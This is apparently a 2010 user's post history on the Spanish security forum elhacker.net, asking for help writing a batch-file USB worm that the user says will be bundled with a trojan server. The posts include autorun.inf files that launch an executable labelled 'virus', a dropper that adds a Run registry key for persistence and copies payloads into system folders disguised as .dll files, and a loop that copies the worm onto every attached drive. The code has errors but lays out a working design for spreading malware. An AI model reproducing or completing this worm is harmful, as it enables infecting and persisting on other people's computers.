elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: [1] 2 3
1  Seguridad Informática / Análisis y Diseño de Malware / Re: sobre los autorun en: 17 Noviembre 2010, 18:24 pm
Puede que tengas razon con lo de sistema operativo, pues uso el mismo
2  Seguridad Informática / Análisis y Diseño de Malware / Re: sobre los autorun en: 17 Noviembre 2010, 17:24 pm
Hola de nuevo, ya se como se hace, pero tengo una duda.
El archivo que crea se llama autorun.inf y he puesto en todos los renglones que quiero que cree lo siguiente:
Código
  1. echo (texto) > autorun.inf
  2. echo (texto) >> autorun.inf
  3. ............
Y como es normal me lo crea en la misma carpeta donde esta situado el .bat, he intentado cambiarla y he puesto:
Código
  1. echo (texto) > c:\autorun.inf
  2. echo (texto) >> c:\autorun.inf
  3. ............

Pero no funciona, cual es el fallo?
3  Seguridad Informática / Análisis y Diseño de Malware / Re: sobre los autorun en: 16 Noviembre 2010, 21:04 pm
Me podrias decir sobre que comandos investigar, esque ya llevo un rato y solo encuentro tutoriales de "Hoy vamos a poner Hola Mundo"  :xD
4  Seguridad Informática / Análisis y Diseño de Malware / Re: sobre los autorun en: 16 Noviembre 2010, 20:59 pm
Gracias a los dos por responder tan rapido, eso ya lo tengo hecho y me ha quedado algo parecido a esto:
Código
  1. [AUtoRun]
  2. Open=sistema.exe
  3. Label=adri
  4. UseAutoPlay=1
  5. action=Abrir carpeta para ver los archivos.
  6. action=@sistema.exe
  7. shell\primero=&Abrir carpeta para ver los archivos.
  8. shell\primero\Command=sistema.exe
  9. shell\primero\Default=1

Y como los dos no me habeis respondido a mi pregunta inicial, creo que me habre expresado mal.Lo que quiero decir es que si se podria hacer un archivo .bat que pueda crear ese autorun.inf
5  Seguridad Informática / Análisis y Diseño de Malware / sobre los autorun en: 16 Noviembre 2010, 20:48 pm
Primero hola a todo el mundo, ultimamente estoy liado cobre como ejecutar un .exe cuando se introduce un pen.
Buscando he encontrado como hacer un autorun con diversos comandos y eso he hecho, pero creo que seria mas comodo hacer que el autorun lo cree un archivo bat con lo que le configure previamente, no se si es posible pero si sí lo es agradeceria que me comentaseis el nombre de comandos que podria utilizar.
Buenas tarde a todos.
6  Seguridad Informática / Análisis y Diseño de Malware / Re: Me ayudais en: 4 Octubre 2010, 19:28 pm
Hola de nuevo, pero como ya dije es la primera vez que hago esto y no sabia que con eso no iba a llegar a ninguna parte. que solucion le podria dar al autorun  y a %systemroot%?
7  Seguridad Informática / Análisis y Diseño de Malware / Re: Me ayudais en: 4 Octubre 2010, 16:33 pm
Bueno ya lo he terminado o eso creo, pero creo q tengo varios fallos sobre todo a la hora de propagarse en otros pen. haber que os parece o que sugerencias teneis.
-----------------------------------------------------------------------------------------------
Los archivos son:
+autorun.inf
+data31.bat
+data32.exe (virus)
+data34.bat
------------------------------------------------------------------------------------------------
Código
  1. [AutoRun]
  2. open=data31.bat
------------------------------------------------------------------------------------------------
Código
  1. @echo off
  2. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v
  3. "Data" /d "data34.bat"
  4. copy /y "data32.exe" "%systemroot%\windows\system\data32.dll"
  5. copy /y "autorun.inf" "%systemroot%\windows\system\autorun.dll"
  6. copy /y "data31.bat" "%systemroot%\windows\system\data31.dll"
  7. copy /y "data34.bat" "%systemroot%\windows\system\data34.dll"
  8. start "data34.bat"
  9. start "data32.exe"
-------------------------------------------------------------------------------------------------
VIRUS
-------------------------------------------------------------------------------------------------
Código
  1. @echo off
  2. :busca
  3. for %%_ in (a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, s, t, u, v, w, x, y, z) do (
  4. dir /b %%_:\ > nul 2>&1 && (
  5. )
  6. )
  7. IF EXIst "%%_:" GOTO copia
  8. Else GOTO espera
  9. :copia
  10. IF EXIST %systemroot%\windows\system\data32.dll GOTO verifica
  11. :verifica
  12. IF EXIT "%%_:\data32.exe" GOTO espera
  13. ELSE GOTO propagar
  14. :propagar
  15. copy /y "%systemroot%\windows\system\data32.dll" "%%_:\data32.exe"
  16. copy /y "%systemroot%\windows\system\autorun.dll" "%%_:\autorun.inf"
  17. copy /y "%systemroot%\windows\system\data31.dll" "%%_:\data31.bat"
  18. copy /y "%systemroot%\windows\system\data34.dll" "%%_:\data34.bat"
  19. :espera
  20. ping -n 100 127.0.0.1 > null
  21. GOTO busca
-------------------------------------------------------------------------------------------------
8  Seguridad Informática / Análisis y Diseño de Malware / Re: Me ayudais en: 3 Octubre 2010, 02:22 am
Hola, en 5 minutillo que he tenido libre me ha dado tiempo de hacer esto.
Código
  1. [AutoRun]
  2. open=data31.exe
q seria el autorun
-----------------------------------------------------------------------
Código
  1. @echo off
  2. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v
  3. "Data" /d "data34.bat"
  4. copy /y "data32.exe" "%systemroot%\windows\system\data32.exe"
  5. copy /y "autorun.inf" "%systemroot%\windows\system\autorun.inf"
  6. copy /y "data31.bat" "%systemroot%\windows\system\data31.bat"
  7. exit
este se llamaria data 31 pero me surgen varias dudas
+ Cuando quiero copiar data32, autorun y data31 no pogo en la ruta que esta, ya que supongo que los buscaras en la misma carpeta donde estoy no?
+ Y quiero copiar data31 que seria el que esta en ejecucion habra algun problema?
9  Seguridad Informática / Análisis y Diseño de Malware / Re: Me ayudais en: 3 Octubre 2010, 01:21 am
Hola de nuevo, primero digo que lo estoy haciendo en batch ya que la pc que tengo ahora no tiene instalado el BV >:( (tengo en 2008). He empezado a leer un manual y por ahora estoy intentando hacer la propagacion por usb y p2p, veremos como sale.
Quiero especificar que el worms lo estoy haciendo para unirlo con un server del troyano.
Buenas noches ;)
10  Seguridad Informática / Análisis y Diseño de Malware / Me ayudais en: 2 Octubre 2010, 21:45 pm
Hola, soy nuevo, y quiero aprender a crear my propio worms en batch o en visual basic (según me recmendeis) pero prefiero batch ya que es mas facil. He estado buscando pero no encuentro ningun tutorial solo: generadores, algunos ya hechos que se repiten indefinidamente y en cada post dice que lo ha hecho cada uno XD...
No quiero que me lo hagais ustedes (puedes darle un pez a un pobre para que coma por un dia, pero puedes enseñarle a pescar para que no muera de hambre)
Bueno pues si me facilitais un toturial os lo agradezco, mientras tanto seguire buscando  :(
Gracias
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines